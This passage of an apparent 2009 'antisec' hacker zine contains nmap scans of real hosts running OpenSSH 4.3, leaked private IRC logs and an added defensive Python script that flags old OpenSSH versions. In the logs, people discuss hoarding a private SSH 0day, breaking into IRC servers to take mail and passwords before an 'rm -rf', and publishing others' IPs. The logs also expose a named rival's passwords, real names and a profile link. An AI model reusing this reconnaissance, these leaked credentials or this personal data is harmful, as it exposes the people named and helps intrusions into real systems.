NSE: Script Scanning completed.
Host ip-70-34-192-50.razorservers.com (70.34.192.50) is up (0.26s latency).
Interesting ports on ip-70-34-192-50.razorservers.com (70.34.192.50):
PORT STATE SERVICE VERSION
2022/tcp open ssh OpenSSH 4.3 (protocol 2.0)

Nmap done: 1 IP address (1 host up) scanned in 3.02 seconds
Raw packets sent: 1 (44B) | Rcvd: 1 (44B)

5. nmap -v -sV -P0 -p 22 absolute.ownage.net

Starting Nmap 4.85BETA9 ( http://nmap.org ) at 2009-06-24 12:23 GTB Daylight Time
NSE: Loaded 3 scripts for scanning.
Initiating Parallel DNS resolution of 1 host. at 12:23
Completed Parallel DNS resolution of 1 host. at 12:23, 0.51s elapsed
Initiating SYN Stealth Scan at 12:23
Scanning absolute.ownage.net (72.20.28.205) [1 port]
Discovered open port 22/tcp on 72.20.28.205
Completed SYN Stealth Scan at 12:23, 0.88s elapsed (1 total ports)
Initiating Service scan at 12:23
Scanning 1 service on absolute.ownage.net (72.20.28.205)
Completed Service scan at 12:23, 0.64s elapsed (1 service on 1 host)
NSE: Script scanning 72.20.28.205.
NSE: Script Scanning completed.
Host absolute.ownage.net (72.20.28.205) is up (0.31s latency).
Interesting ports on absolute.ownage.net (72.20.28.205):
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 1.99)

Nmap done: 1 IP address (1 host up) scanned in 4.07 seconds
Raw packets sent: 1 (44B) | Rcvd: 1 (44B)
// OpenSSH upgraded to 5.2

6. nmap -sV -p 22 ircvps.com

Starting Nmap 5.00 ( http://nmap.org ) at 2009-12-19 13:37 GTB Standard Time
Interesting ports on s69-163-34-138.in-addr.arpa.static.dsn1.net (69.163.34.138):
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.59 seconds


7. anti-sec:~/pwn# ./map ssanz.net

IP: 66.197.143.133 ( osiris.ssanz.net )
WWW: Apache/2.2.11
SSH: SSH-2.0-OpenSSH_4.3

IP: 66.197.204.101 ( devil.ssanz.net )
WWW: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5
mod_mono/2.4 mod_auth_passthrough/2.1 mod_bwlimited/1.4
SSH: SSH-2.0-OpenSSH_4.3


8. Astalavista

[7/4/2009 3:39:52 PM] Glafkos Charalambous: the exploit is openssh v4.3 and below
[7/4/2009 3:40:17 PM] Glafkos Charalambous: what OS was asta running ?
[7/4/2009 3:40:28 PM] Pascal Mittner: CentOS
[7/4/2009 3:40:53 PM] Glafkos Charalambous: centos 5.3 latest version comes with openssh 4.3p2
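
The scan results listed above share one service version. The following is an added example, not part of the original zine, showing how a defender can triage saved nmap -sV output or raw SSH identification strings for OpenSSH at or below 4.3; the function names are hypothetical and the sample hosts and addresses are constructed.

```python
import re

# Threshold from the page's "OpenSSH <= 4.3" annotation, as (major, minor).
THRESHOLD = (4, 3)

# Host header lines: nmap 4.x/5.0 ("Interesting ports on"), newer nmap
# ("Nmap scan report for"), and the "IP:" line of the ./map output above.
HOST_RE = re.compile(r"^(?:Interesting ports on|Nmap scan report for|IP:)\s+(\S+)")
# nmap -sV service row, e.g. "22/tcp open ssh OpenSSH 4.3 (protocol 2.0)".
PORT_RE = re.compile(r"^(\d+)/tcp\s+open\s+ssh\s+OpenSSH[ _]([0-9][\w.]*)")
# Raw identification string, e.g. "SSH-2.0-OpenSSH_4.3".
BANNER_RE = re.compile(r"SSH-[\d.]+-OpenSSH_([0-9][\w.]*)")

# Constructed sample input (documentation addresses, not data from the page).
SAMPLE = """\
Interesting ports on a.example.net (192.0.2.10):
PORT STATE SERVICE VERSION
2222/tcp open ssh OpenSSH 4.3 (protocol 2.0)

Interesting ports on b.example.net (192.0.2.20):
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.2 (protocol 2.0)

Nmap scan report for c.example.net (192.0.2.25)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 10.0p2 (protocol 2.0)

IP: 192.0.2.30 ( d.example.net )
WWW: Apache/2.2.11
SSH: SSH-2.0-OpenSSH_4.3p2
"""


def parse_version(text):
    """Return (major, minor) as integers; the portable 'pN' suffix is ignored."""
    m = re.match(r"(\d+)\.(\d+)", text)
    return (int(m.group(1)), int(m.group(2))) if m else None


def find_openssh(report):
    """Return (host, port, version) for every OpenSSH service found in the text.

    host is the most recent header seen (None if there was none); port is
    None when the version came from a raw banner rather than an nmap row.
    """
    results = []
    host = None
    for raw in report.splitlines():
        line = raw.strip()
        m = HOST_RE.match(line)
        if m:
            host = m.group(1).rstrip(":")
            continue
        m = PORT_RE.match(line)
        if m:
            results.append((host, int(m.group(1)), m.group(2)))
            continue
        m = BANNER_RE.search(line)
        if m:
            results.append((host, None, m.group(1)))
    return results


def at_or_below(report, threshold=THRESHOLD):
    """Return the services whose OpenSSH version is <= threshold.

    Versions are compared as integer tuples: as strings, "10.0" would sort
    before "4.3" and a current release would be flagged by mistake.
    """
    flagged = []
    for host, port, version in find_openssh(report):
        parsed = parse_version(version)
        if parsed is not None and parsed <= threshold:
            flagged.append((host, port, version))
    return flagged


if __name__ == "__main__":
    for host, port, version in at_or_below(SAMPLE):
        where = f"{host}:{port}" if port else host
        print(f"{where}\tOpenSSH {version}")
```

A banner reports only the upstream version string. Distributions that backport fixes, such as the CentOS 4.3p2 package mentioned in the chat above, keep the old number, so the output is a list to check against package changelogs rather than a verdict.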



ANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZ
ANTISECFORLULZ ANTISECFORLULZ
ANTISECFORLULZ Private Chat Logs ANTISECFORLULZ
ANTISECFORLULZ ANTISECFORLULZ
ANTISECFORLULZANTISECFORLULZANTISECFORLULZANTISECFORLULZ


--- Log opened Wed Jun 17 09:05:41 2009
09:05 [Glyph(Glyph@mods.govsec.org)] might want to be more selective.. your 0day is starting to become apparent with each g0troot
09:06 -pand!- Irssi: Starting query in bhf with Glyph
09:07 (RoMeO) wat
09:07 (Glyph) Need to be more 'selective'
09:07 (Glyph) two of two ... tsk, tsk, tsk..
09:07 (RoMeO) you need to explain more, and why do you think i wrote 'g0troot' or ever used it
09:07 (Glyph) If you keep up with that, everyone is gonna now where to look.
09:08 (RoMeO) and where did you see me use it? lol
// Everywhere..

09:08 (Glyph) Doesn't what distro, when there's another 'common element'
// OpenSSH <= 4.3

09:08 (Glyph) Just saying need to be more circumspect.
09:08 (Glyph) Not saying 'you'..
09:09 (RoMeO) okay :]
09:09 (Glyph) But I know you'll get w1rd to those responsible.
09:09 (Glyph) Capice?
09:09 (RoMeO) will do
09:09 (Glyph) If the 'perps' keep it up, it won't be a 0day now will it?
09:10 (RoMeO) ofcourse, but again... i am pretty sure you dont know where to look and if you look hard you will see 'g0troot' only used once in public
09:10 (RoMeO) so i dont know what do you mean by 'need to stop using it' sicne it was only used once from what i read
09:11 (Glyph) Rightio.
09:11 (Glyph) two out of two
09:11 (Glyph) Both had a common element.
09:11 (RoMeO) which is
09:11 (Glyph) Besides being shitty about 'security'
09:11 (Glyph) For pay type product.
09:12 (RoMeO) yeah
09:12 (RoMeO) the targetted people are publicized
09:12 (RoMeO) they are the people that say they are security experts while they dont really qualify to be your average noob
09:12 (RoMeO) the people who publish exploits
09:13 (RoMeO) people who make money out of free stuff, related to 'security' etc
09:13 (Glyph) lol.. not yesterday's demo ;)
09:13 (RoMeO) yesterday was just to prove something to dark
09:13 (RoMeO) he didnt say a word after that
09:13 (Glyph) Aye.. but .....
09:13 (Glyph) tipped the scales in my favour.
09:14 (Glyph) The more it gets done, the more likely it is the 0day is exposed.
09:14 (RoMeO) ofcourse
09:14 (Glyph) Now.. that does NOT mean that all that have the product haven't alreay been 'had'
09:14 (Glyph) But it does lead to disclosure.
09:15 (Glyph) 'Even a blind pig finds an acorn every now and then'
09:15 (RoMeO) sure, i understand
09:15 (Glyph) And InfoSec isn't st00pid like Dark seems to think.
// Really ?

09:15 (RoMeO) i never underestimate anyone
09:15 (RoMeO) thats my rule

09:16 (Glyph) If I can already see 'glimpses', you can bet others out there can as well.
09:17 (RoMeO) let them see it, antisec got more tricks up the sleeves ;p
09:17 -> Glyph chuckles
09:17 (Glyph) I'm well aware of that.
09:17 (Glyph) But don't ya just hate losing 'weaponized' shit for a lark?
09:18 (Glyph) Put that arrow back in yer quiver.. might be really useful sometime down the road.
09:18 (RoMeO) yeah, i understand you, and again it was just to prove something to someone... nothing was left behind, those 'acts' rarely ever happen
09:19 (Glyph) Thing is.. WTF did you need to prove any damn thing to Dark?
09:19 (Glyph) Scratch that.. change pronouns to third person ;)
09:19 (RoMeO) its between me and him ;p
09:19 (RoMeO) he talks alot
09:21 (Glyph) You know I log the publics?
09:21 (RoMeO) i assume alot do

09:22 (RoMeO) i just hope you dont log privates

09:37 (RoMeO) so your job is basically... ?
09:40 (Glyph) Coordinator, IT Research and Special Projects.. in a 2 year college
09:40 (RoMeO) nice, well i will bbl
09:41 (Glyph) Ciao.. and yes that's enough info to figure out who I am.
09:41 (RoMeO) haha
--- Log closed Wed Jun 17 09:46:34 2009

--- Log opened Wed Jun 17 14:21:36 2009
14:21 (Glyph) Aye.
14:22 (Glyph) Don't take the stuff I spin in channel to heart.
14:22 (RoMeO) :)
14:22 (Glyph) I'm interested in debating with Dark.
14:22 (RoMeO) yeah i saw
14:22 (Glyph) Plus it may actually spark some interest in the subject.
14:22 (RoMeO) but again, all he does is talk
14:22 (RoMeO) so what i did when i first met him was
14:22 (RoMeO) to shut him up
14:23 (RoMeO) i put him up on a challenge
14:23 (Glyph) It's a topic that every individual needs to make a decision about.
14:23 (RoMeO) we made some random guy on irc to post a random security site
14:23 (RoMeO) and the challenge was who gets access to it first
14:23 (RoMeO) i got in
14:23 (RoMeO) he didnt
14:23 (RoMeO) but he kept on arguing
14:23 (RoMeO) about how he got vulns on it, but its 'way over my league' rofl
14:24 (Glyph) You know what that sounds like to me?
14:24 (RoMeO) what
14:24 (Glyph) 'tempest in a teacup'
14:24 (RoMeO) lol
14:24 (Glyph) Notice he braced me in channel..
14:24 (Glyph) right.
14:24 (RoMeO) right
14:24 (Glyph) 'When did you stop beating your wife sir?'
14:25 (RoMeO) lol.
14:25 (Glyph) HE should be presuming that everyone has 'skillz' and can whoop his arse.
14:25 (RoMeO) he is all about talk, and its not like he just started this, no no, apparently he been around since 2000 and doing the -same- ever since
14:26 (Glyph) hmmm... I've been around a lot longer than that.
14:26 (RoMeO) yea, just saying its not like he does that here only or just now
14:26 (Glyph) Course I can plead ignorance.. not aware of a lot
14:26 (Glyph) Leopard isn't likely to change its spots
14:27 (RoMeO) haha
14:28 (RoMeO) webdevil knows alot about him too, he was there when he got kicked in his lil challenge
14:28 (RoMeO) and he didnt come back to the channel for a long long time after that
14:29 (Glyph) I presume you have an account at gso
14:29 (RoMeO) i dont know honestly
14:29 (RoMeO) but if ther was, it would be RoMeO
--- Log closed Wed Jun 17 14:34:34 2009


--- Log opened Thu Jun 18 17:35:20 2009
17:35 [Dark(~Administr@EclipticX-85D523E2.hlrn.qwest.net)] Wheres newtype hang these days?
17:35 [Dark(~Administr@EclipticX-85D523E2.hlrn.qwest.net)] Its been so long since I've talked with her
17:35 -pand!- Irssi: Starting query in bhf with Dark
17:36 (RoMeO) we just met on rizon
17:36 (RoMeO) for a small chat
17:36 (Dark) Word
17:36 (Dark) Can I safely assume she's all up in -antisec?
17:36 (Dark) In lieu of recent Astalavista incident?
17:38 (Dark) Well
17:38 (Dark) If you see her around again
17:38 (Dark) Tell her Dark says hi
17:38 (Dark) And thanks for everything
17:38 (RoMeO) what do yoou mean -antisec
17:38 (RoMeO) and willl do
17:39 (Dark) I mean
17:39 (Dark) She's probably restarting her actions
17:39 (Dark) In zfo and whatnot
17:39 (Dark) Just an assumption
17:39 (RoMeO) i dont know really, but she really liked the latest antisec movement
17:39 (RoMeO) actions etc
17:39 (Dark) Good to hear
17:39 (RoMeO) ^^
17:40 (Dark) Along time ago she said she had a ICMP exploit for IOS
17:40 (Dark) I may attempt to locate her and coax it out of her
17:40 (Dark) Seeing as she's probably not using it anymore
17:40 (RoMeO) yea, she is out of all this for now
17:40 (RoMeO) too busy and whatnot
17:40 (Dark) Haha
17:41 (Dark) She's majoring in CompSci yea?
17:41 (RoMeO) yes ;\
17:41 (Dark) Eh
17:41 (RoMeO) i hate CS
17:41 (Dark) Shoulda known
17:41 (Dark) Same
17:41 (RoMeO) too broad
17:41 (Dark) Fucking Linguistics + Econ for great justice
17:41 (RoMeO) java is gay
17:42 (Dark) To be honest, I haven't seen alot of the oldschool people for a really long time
17:42 (RoMeO) yeah
17:42 (Dark) Theres a few left here and there
17:42 (RoMeO) everyone gets busy for some time
17:42 (Dark) I wish they'd pop up
17:42 (RoMeO) but they all come back eventually
17:42 (Dark) I guess making a new antisec is where its gotta be
17:42 (RoMeO) i hope anyways
17:43 (Dark) I think defcon should go over well
17:43 (RoMeO) yes, new movement and just wait for people to join from diff communities
17:43 (Dark) After that
17:43 (Dark) As I see it
17:43 (Dark) Its all out war
17:43 (RoMeO) rawr
17:43 (Dark) So start saving your exploits nao
17:43 (RoMeO) hidden in sekret boxen ;O
17:44 (Dark) For sure
17:44 (RoMeO) lcirc is being monitored now
17:44 (RoMeO) they host #milw0rm and #bottalk
17:44 (Dark) Probably
17:45 (RoMeO) no like. i know for sure
17:45 (Dark) Monitored by pr0jekt types, or by the feds?
17:45 (RoMeO) pr0ject types
17:45 (Dark) I figured as much
17:45 (RoMeO) and feds ofcourse, but pr0ject types got the root shell
17:46 (Dark) You know what the intentions are?
17:46 (RoMeO) take down after exposure
17:46 (RoMeO) intel, private messages, passwords, mail spools, then rm -rf
17:46 (Dark) can't say I've ever really been to lcirc
17:46 (RoMeO) should get them all to stop
17:47 (Dark) Owning milw0rm is a reasonable priority
17:47 (Dark) As well as Secfocus of course
17:47 (RoMeO) it is in the right hands
17:47 (RoMeO) :]
17:47 (Dark) I've been trying to go rogue on some stuff
17:47 (Dark) I'm not part of any group per se now that
17:48 (RoMeO) neither ami
17:48 (RoMeO) doing it on my own
17:48 (RoMeO) i function better solo
--- Log closed Thu Jun 18 18:07:45 2009

--- Log opened Fri Jun 19 09:07:17 2009
09:07 [BSDGurl(BSDGurl@cloaked-A4E6952B.dyn-quarter5.area51.mil)] back
09:07 [BSDGurl(BSDGurl@cloaked-A4E6952B.dyn-quarter5.area51.mil)] are you excited about leaving?
09:09 -pand!- Irssi: Starting query in secchat with BSDGurl
09:09 (RoMeO) well yea ;D
09:10 (BSDGurl) i was reading the logs this morning and like
09:11 (BSDGurl) i have to tell romeo good luck and to be safe etc before he leaves
09:11 (BSDGurl) i know you will have Internet but still
09:11 (RoMeO) :)
09:11 (RoMeO) thxthx
09:11 (BSDGurl) it's kind of scary
09:12 (BSDGurl) i was scared to start uni here
09:12 (RoMeO) thats why i moved bounces this week, i will be idle here 24/7 and read logs / messsages at night / whenver i can get online
09:12 (BSDGurl) hahahaha
09:12 (RoMeO) lawl, i am excitted
09:12 (BSDGurl) yes it was like a mix
09:13 (RoMeO) yea it is a mix of being scared and excitted, but all good
09:13 (BSDGurl) i hope you learn and are not bored
09:13 (BSDGurl) do you have maths and things?
09:13 (RoMeO) no thanks god
09:13 (BSDGurl) yes
09:14 (RoMeO) maths might be involved in a few chapters of the software engineeering, but all good
09:14 (RoMeO) not like computer science for example, which is all around maths and java -_-
09:14 (BSDGurl) hahahaa java
09:14 (RoMeO) yea...
09:14 (BSDGurl) you know i don't hate java
09:14 (BSDGurl) it's just all those guys
09:14 (RoMeO) i hate it cause of what i hear from those people
09:14 (BSDGurl) they ride the nuts
09:14 (BSDGurl) so hard
09:14 (RoMeO) lmao
09:14 (BSDGurl) it's like
09:14 (BSDGurl) funny
09:15 (BSDGurl) i can't help it
09:15 (RoMeO) this friend of mine in uni now
09:15 (RoMeO) his CS teacher walks in the room daily
09:15 (RoMeO) and screams
09:15 (RoMeO) JAVA IS THE FUTURE
09:15 (RoMeO) :|
09:15 (BSDGurl) rofl
09:15 (RoMeO) true story
09:15 (BSDGurl) they all do
09:15 (BSDGurl) hahahaha
09:15 (RoMeO) thats scary lol
09:15 (BSDGurl) i know
09:15 (RoMeO) how could java be possibly the future
09:16 (RoMeO) possibly be*
09:16 (BSDGurl) that's why i can't help but just say things to piss them off
09:16 (BSDGurl) i don't even care
09:16 (RoMeO) every lang got its use, kthxbai
09:16 (BSDGurl) i am like no
09:16 (BSDGurl) i don't even know java
09:16 (RoMeO) me too lmao
09:16 (BSDGurl) it maybe the future for all i know
09:16 (BSDGurl) hahaha
09:16 (RoMeO) future of wat xD
09:16 (BSDGurl) i just imagine them all pissed off
09:16 (RoMeO) lmao
09:16 (RoMeO) 'oh shit'
09:17 (BSDGurl) i went to rootsecurity the other night to see what was going on
09:18 (RoMeO) gay
09:18 (BSDGurl) cos this place is so dea
09:18 (BSDGurl) d
09:18 (BSDGurl) of course it was like
09:18 (BSDGurl) you are some pic
09:18 (BSDGurl) or this or that
09:18 (RoMeO) lol wow
09:18 (BSDGurl) i swear i can't go anywhere
09:18 (RoMeO) ;(
09:18 (RoMeO) - /nick BSDBoi
09:18 (BSDGurl) haha
09:18 (RoMeO) lolol
09:19 (BSDGurl) i don't understand i
09:19 (BSDGurl) t
09:19 (RoMeO) its internet
09:19 (BSDGurl) you know the big deal
09:19 (BSDGurl) oh and the guy
09:19 (BSDGurl) the one you banned that asked me if i was nell
09:19 (RoMeO) lol yea
09:19 (BSDGurl) he joined bhf and said
09:19 (BSDGurl) this chan is for fags
09:20 (BSDGurl) then left
09:20 (BSDGurl) rofl
09:20 (RoMeO) ;O
09:20 (RoMeO) he gots issues
09:20 (BSDGurl) so you know i am expecting people to say
09:20 (BSDGurl) bsdgurl this is you
09:20 (BSDGurl) and show me someone named nell now
09:20 (BSDGurl) hahaha
09:20 (RoMeO) xD
09:20 (RoMeO) 'i had you on myspace'
09:20 (RoMeO) wat
09:20 (RoMeO) .
09:21 (BSDGurl) i know
09:21 (BSDGurl) god being on that site
09:21 (BSDGurl) i was years ago
09:21 (RoMeO) facebook is nice ;p

// http://www.facebook.com/profile.php?id=1119054258 :)

09:21 (BSDGurl) like i haven't been for at least 2
09:21 (BSDGurl) no lie
09:21 (BSDGurl) i wouldn't lie i still have all the flash profiles i made etc
09:22 (RoMeO) haha
09:22 (BSDGurl) you know because you could custom it
09:22 (RoMeO) yeah
09:22 (RoMeO) not a myspace fan
09:22 (RoMeO) tho
09:22 (BSDGurl) me either now
09:22 (RoMeO) facebook is simple and good
09:22 (BSDGurl) i have an account
09:22 (BSDGurl) it's fake
09:23 (RoMeO) lol i hae a fake account with my public email there
09:23 (BSDGurl) last log in was december i think
09:23 (RoMeO) and i lol when people join dmz to tell me
09:23 (RoMeO) 'hello john genter'
09:23 (RoMeO) cause the name there is john genter
09:23 (RoMeO) lmfao
09:23 (BSDGurl) rofl
09:23 (BSDGurl) i hate that myspace shit though
09:23 (BSDGurl) seriously
09:24 (RoMeO) yeah
09:24 (BSDGurl) so yeah i am nell
09:24 (BSDGurl) haha
09:24 (RoMeO) hai nell
09:24 (RoMeO) xD
09:24 (RoMeO) http://www.nellmcandrew.tv/
09:24 (BSDGurl) i am curious to see if meathive stays
09:24 (RoMeO) i lol'd
09:25 (BSDGurl) last night he was really pissed at asta
09:25 (RoMeO) yea i saw
09:25 (BSDGurl) i told him you know the servers aren't related
09:25 (BSDGurl) but i don't think he believed me
09:25 (RoMeO) what servers
09:26 (RoMeO) irc and web?
09:26 (BSDGurl) they irc
09:26 (BSDGurl) the
09:26 (RoMeO) yeah
09:26 (RoMeO) its ok lol
09:26 (BSDGurl) i didn't want to like go into with him
09:27 (BSDGurl) i was just like do what you think is best:/
09:27 (BSDGurl) i didn't know what to say
09:27 (RoMeO) haha, what is he doing anyways
09:27 (RoMeO) i just saw a rant
09:27 (BSDGurl) i know
09:27 (BSDGurl) i don't know what
09:28 (RoMeO) i think people should move on already
09:28 (BSDGurl) Me TOO
09:28 (RoMeO) lol!
09:28 (BSDGurl) thank you
09:28 (RoMeO) sites get hacked all the time
09:28 (BSDGurl) you know what i said
09:28 (BSDGurl) think about this
09:28 (BSDGurl) you know if you staged
09:28 (BSDGurl) that
09:29 (BSDGurl) and threw those ads
09:29 (BSDGurl) back up
09:29 (RoMeO) stunt
09:29 (BSDGurl) you would make bank
09:29 (RoMeO) yes.
09:29 (BSDGurl) :)
09:29 (RoMeO) everyone checks asta now to see whats new in the 'hack'
09:29 (RoMeO) lolol
09:29 (BSDGurl) yes
09:29 (BSDGurl) think about that
09:29 (RoMeO) it got more backlinmks than google over night
09:29 (BSDGurl) membership down
09:30 (BSDGurl) etc
09:30 (BSDGurl) now look
09:30 (BSDGurl) cash in
09:30 (BSDGurl) think about it for darkmindz too
09:30 (BSDGurl) hahaha
09:30 (RoMeO) lmfao
09:30 (RoMeO) 'HACKED AND EXPOSED'
09:30 (BSDGurl) pwn xlink
09:31 -> BSDGurl dies
09:31 (RoMeO) and put all kinda ads on there, and blame the hacker
09:31 (BSDGurl) yes
09:31 (RoMeO) fun
09:31 (RoMeO) if i ever need money in uni, thats plan A
09:31 (BSDGurl) biber can be fall guy
09:31 (BSDGurl) hahaha
09:31 (RoMeO) ^^
09:32 (BSDGurl) let me go back to art shit
09:32 (RoMeO) oh enjoy
09:32 (BSDGurl) i just wanted to tell you have a safe trip
09:33 (RoMeO) thank you <3
09:33 (BSDGurl) if i didnt get to talk
09:33 (RoMeO) ^_^
09:33 (BSDGurl) <3 you are very welcome
--- Log closed Fri Jun 19 09:34:04 2009

--- Log opened Sun Jun 21 09:24:55 2009
09:24 [{Glyph_Home}(~glyph@mods.govsec.org)] btw, unless it's been you whacking GSO, the technique is becoming widespread.
09:25 -INFO- Irssi: Starting query in bhf with {Glyph_Home}
09:25 (RoMeO) mm?
09:28 (RoMeO) what are you talking about lol
09:29 ({Glyph_Home}) GSO has had issues this past week.
09:29 ({Glyph_Home}) I thought perhaps you were the reason.
09:29 (RoMeO) because rsnake released a DoS tool
09:29 (RoMeO) nope
09:29 ({Glyph_Home}) No.. the litespeed issue
09:29 (RoMeO) my issues dont go on lagging web servers
09:30 ({Glyph_Home}) Though I have no idea why you'd nail GSO
09:30 ({Glyph_Home}) Doesn't seem to be your 'venue'
09:30 (RoMeO) that too
09:31 ({Glyph_Home}) I've already talked with Edu and WebDevil..
09:31 (RoMeO) about
09:31 ({Glyph_Home}) Gonna make my 'recommends' to the admins this week.
09:31 (RoMeO) i find it funny how staff at 'black hat forums' get to be staff at ' gov sec'
09:32 ({Glyph_Home}) Quesion: Any tips on 'mitigating' the /g0troot issue?
09:32 -> {Glyph_Home} chuckles
09:32 ({Glyph_Home}) Not exactly a 'whitehat' myself.
09:32 (RoMeO) lolol
09:32 ({Glyph_Home}) I just don't 'participate' in the darkside anymore.
09:33 (RoMeO) just keep the site clean, didnt see gso being mentioned anywhere as a target, ever
09:33 (RoMeO) so all good
09:33 ({Glyph_Home}) Used to..

09:33 (RoMeO) but people who are going down soon are botnet communities for example
09:34 ({Glyph_Home}) hmmm... Sounds like a shadowserver operation.
09:34 (RoMeO) just cleaning the net
09:34 ({Glyph_Home}) Straight out of the 'toyshop'
09:34 (RoMeO) :]
09:35 ({Glyph_Home}) Antisec is beginning to sound more like 'cybercops'
09:36 (RoMeO) haha

09:36 (RoMeO) wont be done under antisec
09:36 (RoMeO) antisec is kept for 'security' issues
09:36 (RoMeO) this is, botnet and skids crap

09:36 ({Glyph_Home}) hmmm...
09:37 ({Glyph_Home}) IFF I can be of assistance, without endangering current position, I offer my not so hot skill sets.
09:37 (RoMeO) all good so far
09:37 (RoMeO) lcirc and indoirc got comprimised
09:37 (RoMeO) the 2 largest botnet and ccpower ircd's
09:38 ({Glyph_Home}) w00f
09:38 (RoMeO) ;)
09:38 ({Glyph_Home}) Might be an idea for the info to make it back to the ccproviders.. discretely and anonymously of course.
09:38 (RoMeO) well
09:38 (RoMeO) the idea is
09:39 (RoMeO) to release all intel and ip's on the people who started those channels / irc's
09:39 (RoMeO) out in the public and all over the net
09:39 (RoMeO) let the authorities deal with that
09:39 ({Glyph_Home}) roflmao
09:39 (RoMeO) :]
09:39 (RoMeO) brb
--- Log closed Sun Jun 21 09:44:31 2009


--- Log opened Mon Jun 22 16:15:04 2009
16:15 (Glyph) ?
16:15 (Glyph) Oh.. that stuff
16:15 (Glyph) Old stuff.. was playing more or less.
16:16 (Glyph) Course my 'playtime' tends to lead to profitability ;)
16:16 (Glyph) All that is at least five years old or older.
16:16 (Glyph) circa 2005
16:17 (RoMeO) yeah
16:17 (RoMeO) thinking of setting up a box for dark
16:17 (RoMeO) see what is he going to do
16:17 (RoMeO) of course everything will be patched to log in's and out's // HOOKIN.. HOOKOUT..
16:18 (Glyph) Well you know the saying.. friends close, enemies closer ;)
16:18 (RoMeO) yeah
16:18 (RoMeO) sure do
16:18 (Glyph) Can't believe spike threw error's like that, and that's what he recommended?
16:18 (RoMeO) lol
16:19 (RoMeO) thats why i want to see what is he going to do on a box
16:19 (RoMeO) anyone can talk
16:19 (RoMeO) specially on the internet
16:19 (Glyph) I'm beginning to think he 'talk's a good game'..
16:19 (Glyph) snap!
16:19 (RoMeO) :P
16:19 (RoMeO) thats what i heard from everyone so far
16:19 (RoMeO) i will even give him a non-chrooted shell
16:19 (Glyph) Have you lost your mind?
16:19 (RoMeO) lol
16:19 (Glyph) Damn if I'd trust him that far.
16:20 (RoMeO) it will be an empty box
16:20 (Glyph) jailed, maybe.. unjailed never.
16:20 (RoMeO) and every shell is modified to log to a remote system
16:20 (Glyph) Now yer sounding like me.
16:20 (RoMeO) i will sit there with a cup of tea and tail -f
16:21 (Glyph) tail -f firewall | grep 'insert key phrase of the day here'
16:28 (RoMeO) reading stories about knuth
16:28 (RoMeO) how to own a continent for example
16:28 (RoMeO) that one is amazing
16:29 (Glyph) It's NOT hard.
16:29 (RoMeO) if you didnt read it, you should
16:38 (RoMeO) i was looking around dark for a while
16:38 (RoMeO) and what surprised me is
16:38 (RoMeO) his really low-quality passwords
16:38 (RoMeO) like
16:38 (RoMeO) 123123
16:38 (RoMeO) or 123pass
16:38 (RoMeO) etc
16:38 (RoMeO) made me go ?
16:39 (Glyph) almost as bad as qwerty12345
16:39 (RoMeO) yes
16:40 (RoMeO) just one more thing that shows he is talk-only
16:40 (RoMeO) okay he can argue that he doesnt 'reuse passwords' but using really weak passwords -does- mean something
16:40 (Glyph) worse yet.. he could be a c&p
16:40 (RoMeO) that would be so bad
16:43 (Glyph) Yeah.. it would.
16:44 (Glyph) Actually, I sometimes think you and he are one in same and are playing 'mindfuck' with me.
16:44 (RoMeO) hahaa
16:44 (RoMeO) why would we tho
16:45 (Glyph) Because you were bored with the brainless fucks we normally encounter.
16:46 (RoMeO) when that happens i just log on a shell and explore ;p
16:46 (RoMeO) one more thing
16:46 (RoMeO) dark is a yahoo user
16:46 (RoMeO) that counts
16:47 (RoMeO) thats -100 sec points
16:47 (RoMeO) i do tag people by their emails too
16:47 (RoMeO) for example
16:47 (RoMeO) yahoo users, mostly newbies / females
16:48 (RoMeO) hotmail users, same thing but a higher level a small higher level
16:48 (RoMeO) gmail users are on top and above that comes the people with their own mail servers
16:48 (RoMeO) its a lot deeper than that, but thats just a quick explanation :P
16:50 (RoMeO) found 2 passwords of dark in my db
16:50 (RoMeO) and they both fail
16:50 (RoMeO) hellohello is one of them -_-'
--- Log closed Mon Jun 22 16:55:25 2009

--- Log opened Tue Jun 23 17:19:55 2009
17:19 (Glyph) ?
17:20 (RoMeO) 15:23:42 (Glyph) Apache/2.2.11 (FreeBSD)
17:20 (RoMeO) 15:24:33 (Glyph) Johnny_Demonik
17:20 (RoMeO) 15:27:48 (Glyph) ERROR: Database error.
17:20 (Glyph) Ahhh...
17:21 (Glyph) He came up out of 64.127.41.18
17:22 (RoMeO) ah
17:22 (Glyph) That ip is apparently a 'shell' anyhow there's port 9050 on it.
17:22 (Glyph) But it goes back to WestVirginia..
17:22 (RoMeO) yeah
17:23 (Glyph) Firm called Compucrash
17:23 (Glyph) Their webserver is at .3 of that range.
17:23 (RoMeO) alrit, lets just hope he comes back here, busy with another hack ;p
17:23 (Glyph) So silly me, I tried to access their ircd thru their webpage.
17:23 (RoMeO) lol
17:24 (Glyph) That's when the MySQL threw the error code at me.
17:24 (Glyph) Then I checked the forums.
17:24 (Glyph) You wouldn't believe it.. PHPBB3
17:24 (Glyph) Pr0nsters have already been at it.
17:24 (RoMeO) lmao
17:24 (RoMeO) yea
17:25 (RoMeO) i saw that one
17:25 (Glyph) Not heavily.. but that's prolly because it's 'under the radar'
17:25 (Glyph) Plus the bw is pricey as heck.
17:26 (Glyph) I'm heading home..
17:26 (Glyph) You have a good un.
17:26 (RoMeO) thanks
17:26 (RoMeO) enjoy
--- Log closed Tue Jun 23 17:31:25 2009

--- Log opened Wed Jun 24 17:11:08 2009
17:11 [Glyph(Glyph@mods.govsec.org)] http://74.125.47.132/search?q=cache:jdsSh2XXmQAJ:www.fcc.gov/mb/engineering/2008_PSIDs_form325.xls+%22MetroCast+Communications+of+Mississippi%22&cd=12&hl=en&ct=clnk&gl=us
--- Log closed Wed Jun 24 17:16:42 2009

--- Log opened Sat Jun 27 23:05:38 2009
23:09 [{Glyph_Home}(~glyph@mods.govsec.org)] you don't have anything to 'fear' from me mate.
23:10 [{Glyph_Home}(~glyph@mods.govsec.org)] I make sure I don't know anything.

// We make sure everyone else does..

23:46 [notrael(notrael@tdirc-F327CDE7.org)] hi
23:46 [notrael(notrael@tdirc-F327CDE7.org)] i like the ending you added to the dikline motto
